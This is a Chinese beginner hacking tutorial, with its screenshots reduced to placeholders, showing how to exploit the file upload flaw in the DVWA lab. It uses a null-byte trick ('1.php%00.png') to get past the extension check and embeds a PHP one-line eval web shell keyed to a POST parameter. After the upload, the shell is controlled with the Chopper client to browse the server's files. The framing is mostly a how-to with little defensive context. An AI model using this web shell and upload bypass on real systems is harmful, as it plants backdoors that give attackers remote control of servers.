在kali的里面随机找一张png结尾的图片,然后重命名一下改成1.php%00.png 。
文章插图
改成这样的名字!!
文章插图
然后用编辑器编辑一下!
文章插图
在空白处写入一句话木马!!<%php @eval($_POST[pass]);?>
像这样:
文章插图
然后保存!
文章插图
打开burpsuit抓个包看看!!
文章插图
文章插图
【黑客入门利器,dvwa文件上传漏洞,带你进入黑客大门】
可惜了,我们用了%00截断不需要改包!
这样就上传成功!!!
文章插图
在菜刀地址上填上上路径!!再填上上密码!!!
文章插图
就可以看见我的服务器里面的目录了,因为我的centos 7 所以罗!
文章插图
然后我们进入我的服务器端看看!!
文章插图
画红线的就是我们上传的木马!!!
推荐阅读
- mysql入门级,20分钟搞定
- 解读黑客入侵你Linux服务器的一万种玩法
- 如何成为一名黑客
- IP地址基础入门知识
- 最经典的黑客技术入门知识大全
- 我的天,内网渗透,大黑客是这样进行操作的
- GNOME Linux 桌面入门
- 利器burpsuit,你真的了解黑客是怎么用的嘛?
- 小白都能使用bash脚本编写黑客工具
- 初级黑客技巧,老系统用的后门技巧